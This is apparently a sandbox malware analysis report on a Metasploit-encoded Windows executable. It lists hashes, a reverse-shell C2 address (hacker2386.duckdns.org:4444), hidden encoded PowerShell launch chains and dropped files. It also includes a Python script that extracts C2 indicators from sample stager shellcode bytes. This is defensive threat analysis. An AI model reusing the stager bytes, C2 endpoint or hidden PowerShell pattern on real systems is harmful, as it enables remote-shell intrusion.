Analysis

  • max time kernel
    31s
  • max time network
    42s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    08-09-2024 05:16

Errors

Reason
Machine shutdown

General

  • Target

    d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe

  • Size

    318KB

  • MD5

    d39fccd98f2225bba9db7ba4636ceef3

  • SHA1

    a333cbb04d50cc455c2084933b21bbb2ef370a4f

  • SHA256

    f2ca01177834859fa2f60bc1d060949ea88c15e38aa2de021f16dfdcea804724

  • SHA512

    e8d8c36f30f0072db21ed2a7c1e3cc4c0301b83d8348d1f474fac9e2228a1666c548da2bca1c8d539dac0cfaf09422659df3a62cb9b2e02876794773b132b0f3

  • SSDEEP

    6144:wtNb6TiU8liKNKCkC2Uus2czyD6FOWqxVyliAy7O6KLRvv7D:wtN+PznJTfc+mjpU/OtpD

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp_dns

C2

hacker2386.duckdns.org:4444
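The two extractions above identify a 32-bit Metasploit reverse_tcp_dns stager wrapped in the shikata_ga_nai encoder. Once the encoder loop has run (in an emulator, or by dumping the PowerShell process after injection), the stager is plain x86 and its C2 can be recovered by pattern matching rather than by a full disassembly. The following is an added example, not code from the sandbox or from the Metasploit project. SAMPLE_STAGER is a constructed stand-in, not the sample's bytes; the block_api prologue, the pushed sockaddr_in (AF_INET and the port in network byte order) and the trailing NUL-terminated hostname are assumptions taken from the stock Metasploit x86 stager templates, which can differ between framework versions.

```python
import re
import struct

# Constructed stand-in for a DECODED 32-bit reverse_tcp_dns stager (not the
# sample's bytes, which ship shikata_ga_nai-encoded). Layout assumed from the
# stock Metasploit x86 templates: block_api prologue, pushed sockaddr_in,
# NUL-terminated hostname resolved by the stager with gethostbyname.
SAMPLE_STAGER = (
    b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0"  # cld; call; pushad; mov ebp,esp; xor eax,eax
    b"\x64\x8b\x50\x30"                              # mov edx, fs:[eax+0x30]  (PEB walk)
    b"\x8b\x52\x0c\x8b\x52\x14"                      # start of the API-hash walker
    b"\x68\x02\x00\x11\x5c"                          # push 0x5c110002: AF_INET=2, port 0x115c = 4444
    b"\x89\xe6\x6a\x10\x56\x57"                      # mov esi,esp; push 16; push esi; push edi
    b"\xff\xd5\xff\xd5"                              # call ebp (block_api dispatch)
    b"hacker2386.duckdns.org\x00"                    # C2 hostname from this report
    b"\x00\x00\x00\x00"
)

# First 15 bytes of the Metasploit x86 block_api stub; a heuristic, since
# template changes can shift the call offset.
MSF_PROLOGUE = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"

# push imm32 whose low word is AF_INET (2) and high word is sin_port.
SOCKADDR_PUSH = re.compile(rb"\x68\x02\x00(..)", re.DOTALL)

# NUL-terminated run of hostname characters; validated further below.
HOSTNAME = re.compile(rb"[A-Za-z0-9][A-Za-z0-9.-]{2,252}\x00")


def is_plausible_hostname(name: str) -> bool:
    """At least two non-empty labels and an alphabetic TLD."""
    labels = name.split(".")
    return len(labels) >= 2 and all(labels) and labels[-1].isalpha()


def extract_c2(buf: bytes) -> dict:
    """Pull prologue match, candidate ports and hostnames from a decoded stager."""
    ports = []
    for m in SOCKADDR_PUSH.finditer(buf):
        port = struct.unpack(">H", m.group(1))[0]  # sin_port is big-endian
        if port:
            ports.append(port)
    hosts = []
    for m in HOSTNAME.finditer(buf):
        name = m.group(0)[:-1].decode("ascii")
        if is_plausible_hostname(name):
            hosts.append(name)
    return {
        "msf_prologue": buf.startswith(MSF_PROLOGUE),
        "ports": ports,
        "hosts": hosts,
    }


if __name__ == "__main__":
    print(extract_c2(SAMPLE_STAGER))
```

The sockaddr push is the more reliable of the two indicators: the hostname search will also fire on any other dotted ASCII string in the buffer, so treat a host as confirmed only when it sits near a matching port push. None of this matches the raw file, because shikata_ga_nai XORs everything after its decoder stub; run it on the post-decode buffer only.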

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell with a hidden display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1484
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand 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
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2424
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand 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
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3236
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc 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
          4⤵
          • Blocklisted process makes network request
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1636
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ecwugerd\ecwugerd.cmdline"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4628
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES885A.tmp" "c:\Users\Admin\AppData\Local\Temp\ecwugerd\CSCF614E8EAB1614B4583BD7E6B30F7CAD6.TMP"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:4460

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES885A.tmp

    Filesize

    1KB

    MD5

    d52a87a4ec1c252ceb72c3e366bb0998

    SHA1

    fc5a9890ef3da9e2cda434c347fd2a3ff75ee0de

    SHA256

    2509f9901ccd7025ce1b41364fdff146734de5e89262b3ded44054ba0e4a2708

    SHA512

    9b46091f633211ea6e80012fbdae755c40581dfe610d603b9a957cbf13c42a54d3d2c098a240beaaf1fa24d65c3f933b05db04908ff93ea4b5877986a1b9a7a4

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q4pal0vl.04z.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\ecwugerd\ecwugerd.dll

    Filesize

    3KB

    MD5

    8bccf198bce3ec3639b6da180ca82ab3

    SHA1

    9f88cf888199c5023d24cac0f2401523734c69c2

    SHA256

    fd915122d4d428d466221f632231f85ddfcc355dc53377752c73a833a4116b0b

    SHA512

    079003ff35228bf3f3a27d439e0a152381bf176cede2079162584c6ad8374cd8e2399f5d20d9fca471d6e3dc67a262d72d01204fc66d18da03014aa2e0979cc5

  • \??\c:\Users\Admin\AppData\Local\Temp\ecwugerd\CSCF614E8EAB1614B4583BD7E6B30F7CAD6.TMP

    Filesize

    652B

    MD5

    f49106bdcf140840a2b363bddd434f46

    SHA1

    64c2974035a064aa93c7d2fb363cf93ba195d459

    SHA256

    ed40c39d9bec214270623e9994069cdab9af4343066726abcbd8ec22750f54ae

    SHA512

    1341d745c45300990d70e23a2523e448cc51bddffe91db8c29f533dcc8b7c6f26f68d91dc13fe23e558c416882ba658e033061e1d3dc1978b85ee16670edc0c7

  • \??\c:\Users\Admin\AppData\Local\Temp\ecwugerd\ecwugerd.0.cs

    Filesize

    557B

    MD5

    7319070c34daa5f6f2ece2dfc07119ee

    SHA1

    f26a4a48518a5608e93c8b77368f588b0433973c

    SHA256

    b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

    SHA512

    34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

  • \??\c:\Users\Admin\AppData\Local\Temp\ecwugerd\ecwugerd.cmdline

    Filesize

    369B

    MD5

    54b2277da8ac4201c6c16c92d47b73e0

    SHA1

    4b0cc7030e8f9e357e865ac93a3b53e496fb4a08

    SHA256

    fdf4ea03c97b22f2f121b8e783858062432b1dce4657eac1940f706c46661478

    SHA512

    a381996ff1085fd46770f5400fa9dc78fdca692608ae31b3822ea4b94e2344af626db7c2f2cb0ddf4b0dc53e5eeab5cd1dc32dddac133b80b532a526bf1460bc

  • memory/1484-0-0x0000000000400000-0x0000000000452000-memory.dmp

    Filesize

    328KB

  • memory/1636-23-0x0000000002A70000-0x0000000002AA6000-memory.dmp

    Filesize

    216KB

  • memory/1636-24-0x0000000005420000-0x0000000005A48000-memory.dmp

    Filesize

    6.2MB

  • memory/1636-26-0x0000000005220000-0x0000000005286000-memory.dmp

    Filesize

    408KB

  • memory/1636-27-0x0000000005290000-0x00000000052F6000-memory.dmp

    Filesize

    408KB

  • memory/1636-37-0x0000000005A50000-0x0000000005DA4000-memory.dmp

    Filesize

    3.3MB

  • memory/1636-38-0x0000000006040000-0x000000000605E000-memory.dmp

    Filesize

    120KB

  • memory/1636-39-0x0000000006080000-0x00000000060CC000-memory.dmp

    Filesize

    304KB

  • memory/1636-40-0x00000000078C0000-0x0000000007F3A000-memory.dmp

    Filesize

    6.5MB

  • memory/1636-41-0x0000000006580000-0x000000000659A000-memory.dmp

    Filesize

    104KB

  • memory/1636-25-0x0000000005080000-0x00000000050A2000-memory.dmp

    Filesize

    136KB

  • memory/1636-56-0x0000000006670000-0x0000000006671000-memory.dmp

    Filesize

    4KB

  • memory/1636-54-0x00000000065F0000-0x00000000065F8000-memory.dmp

    Filesize

    32KB

  • memory/2424-11-0x000001BE5B560000-0x000001BE5B582000-memory.dmp

    Filesize

    136KB

  • memory/2424-1-0x00007FFABBF33000-0x00007FFABBF35000-memory.dmp

    Filesize

    8KB

  • memory/2424-12-0x00007FFABBF30000-0x00007FFABC9F1000-memory.dmp

    Filesize

    10.8MB

  • memory/2424-13-0x00007FFABBF30000-0x00007FFABC9F1000-memory.dmp

    Filesize

    10.8MB

  • memory/2424-57-0x00007FFABBF33000-0x00007FFABBF35000-memory.dmp

    Filesize

    8KB

  • memory/2424-58-0x00007FFABBF30000-0x00007FFABC9F1000-memory.dmp

    Filesize

    10.8MB